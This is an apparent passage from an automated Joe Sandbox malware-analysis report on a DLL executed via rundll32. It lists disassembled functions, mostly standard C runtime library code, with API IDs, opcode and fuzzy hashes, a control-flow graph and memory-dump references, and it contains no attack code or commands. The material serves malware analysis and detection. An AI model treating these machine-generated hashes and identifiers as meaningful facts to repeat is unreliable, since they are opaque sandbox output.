                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2943138195-0
                                                                                                                                                                                                                                                  • Opcode ID: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                                                  • Instruction ID: 318727eee5e13463933b1bdaa130879d0bade3f0a89f414074ac98ea7bab58df
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD711C72710A49AAFB52DFA4D4913DC37B1A7487CCF808515EE4967A99EF30C71AC390
                                                                                                                                                                                                                                                  Function 000000018001994C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 192COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2295 18001994c-180019990 2296 180019992-1800199ab call 180011e60 2295->2296 2297 1800199b0-1800199b4 2295->2297 2306 180019bf9-180019c1f call 18005bf80 2296->2306 2299 1800199b6-1800199da call 1800184b8 2297->2299 2300 180019a08-180019a18 2297->2300 2312 1800199dc-1800199e6 2299->2312 2313 1800199eb-180019a03 call 180011e30 2299->2313 2301 180019a1c-180019a20 2300->2301 2304 180019a22-180019a24 2301->2304 2305 180019a31-180019a39 2301->2305 2304->2305 2308 180019a26-180019a2f 2304->2308 2309 180019a3b-180019a4d 2305->2309 2310 180019a4f-180019a59 2305->2310 2308->2301 2308->2305 2315 180019a94-180019abb call 180017df8 2309->2315 2316 180019a5f-180019a63 2310->2316 2318 180019bb3-180019bb6 2312->2318 2313->2318 2330 180019ac1-180019acb 2315->2330 2331 180019b5c-180019b7d call 180011998 call 180011f88 2315->2331 2322 180019a74-180019a7c 2316->2322 2323 180019a65-180019a67 2316->2323 2320 180019bf2-180019bf5 2318->2320 2321 180019bb8-180019bc2 2318->2321 2320->2306 2321->2320 2326 180019bc4-180019bc7 2321->2326 2328 180019a82-180019a90 2322->2328 2329 180019b7f-180019b82 2322->2329 2323->2322 2327 180019a69-180019a72 2323->2327 2326->2320 2332 180019bc9-180019bdd call 180016334 2326->2332 2327->2316 2327->2322 2328->2315 2333 180019b84-180019b88 2329->2333 2334 180019b9a-180019ba8 call 1800118e8 2329->2334 2330->2331 2335 180019ad1-180019adf 2330->2335 2351 180019b4e-180019b5a call 180011fb4 2331->2351 2332->2320 2346 180019bdf-180019bed 2332->2346 2333->2334 2338 180019b8a-180019b98 2333->2338 2340 180019bad-180019bb0 2334->2340 2341 180019ae1-180019af9 2335->2341 2342 180019b00-180019b17 call 18003f980 2335->2342 2338->2318 2340->2318 2341->2342 2355 180019b19-180019b28 call 1800112f4 2342->2355 2356 180019b2d-180019b4a call 180011998 call 180011f88 2342->2356 2346->2320 2351->2340 2355->2340 2356->2351
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                                  • API String ID: 3676697650-3207858774
                                                                                                                                                                                                                                                  • Opcode ID: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                                                  • Instruction ID: 42aa4a1d08367d9119b1856bc683fc241d67aaeadb9c155bb09d8b169f315b88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2817A32616A8C89FBA2CFA5E4903E837A1A75DBC8F94C116FA4907795DF39C749C340
                                                                                                                                                                                                                                                  Function 0000000180015478 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                                  • API String ID: 2943138195-1464470183
                                                                                                                                                                                                                                                  • Opcode ID: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                                                  • Instruction ID: 86b2220616b80be68583d285cd14afb8824f7222dcd2462d23f21e207e41fe12
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90514F32610F58C9FB92CB64E8907EC37B2B7183C9FA08015EA895BA98DF35C659C740
                                                                                                                                                                                                                                                  Function 000000018003D970 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                  • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                  • Opcode ID: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                  • Instruction ID: 634aa9d0042bbda353e8cc45d4c8daf7f92220045ba3d69c75e7207222ffe171
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C412B032A0418D86FBA76E15F0443EB77A1F788B94F96C116F68647AC4DF78C688CB00
                                                                                                                                                                                                                                                  Function 000000018003E3D4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 478COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                  • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                  • Opcode ID: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                  • Instruction ID: 93a9ff39d45d2419c6a7fc755833649a49288bc20d1d0bfe1c27cd3576f2de20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E612E331A042DA86FBA39B14D0543EB7791F35ABD4F9AC312F696476C4DF38C6888B10
                                                                                                                                                                                                                                                  Function 0000000180017220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                                  • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                                                  • Opcode ID: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                  • Instruction ID: 11c260e0c16152af3f3440f9639a3bccbf9e6650033c1e5fc3f0bfcfe7c7928e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30513872B14F5898FB928B60D8803ED77B0B70C788F548125EE5923B96DF788389C710
                                                                                                                                                                                                                                                  Function 000000018002068C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 475COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: -$f$p$p
                                                                                                                                                                                                                                                  • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                                                  • Opcode ID: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                  • Instruction ID: 3b4b050498cdcb5f336cd356739b46ea81abb083d02af334d156d32d0928b2a6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B12A27160438A86FBA39B14E0447EA7762F3587D4FF4C115F6D246AC6DF39CA888B05
                                                                                                                                                                                                                                                  Function 000000018000C928 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                  • Opcode ID: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                  • Instruction ID: d2b285feaf2a7c9902849b73c345f52bfdc77f3075a64cd68fdca09590970db2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D18D32604B488AEBA2DB25D4807DD3BA0F7497C8F008216FF8957B96CF34D689C701
                                                                                                                                                                                                                                                  Function 000000018004816C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482EB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482F7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                  • Opcode ID: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                                                  • Instruction ID: 950cb933599524e4be349329b0f14d28e915af748e4a11c5b25ef056b0586ea4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C941F231311E0881FAA7CB16AD403DA2396BB4DBE4F49C925BE1A97784EE3CC64D9344
                                                                                                                                                                                                                                                  Function 0000000273F41740 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: QueryVirtual
                                                                                                                                                                                                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                                                  • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                                                  • Opcode ID: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                                                  • Instruction ID: 663189738c40874af7135dc25b0b982f4eec5aa8fa6ad61ed8319b582aa1f326
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB41AF72F08F4482EB14DB51E8497DA77A0F789BE0F644220DA4D07BA5EB38C685E742
                                                                                                                                                                                                                                                  Function 0000000180048428 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-537541572
                                                                                                                                                                                                                                                  • Opcode ID: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                                                  • Instruction ID: 0e08bba11ac0ad9f6f6124514d17085406b5fd0418ae2fa010a6a0cc5cd50d11
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31A031711E0581EBA39B16984039D63A4BB4CBE4F5D8A25BF2A437D5EF38CA498308
                                                                                                                                                                                                                                                  Function 0000000180007470 Relevance: 12.2, APIs: 8, Instructions: 234threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                                                                                                                                  • Opcode ID: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                                                  • Instruction ID: de2e915fae306b5b51e8ed7498582b349e8bb643afe958a96c2b02e58ec33d63
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13D17976609B8882DAB1DB0AE49439A77A0F39CBC5F108216FACD477A5CF7DC655CB00
                                                                                                                                                                                                                                                  Function 0000000180019740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
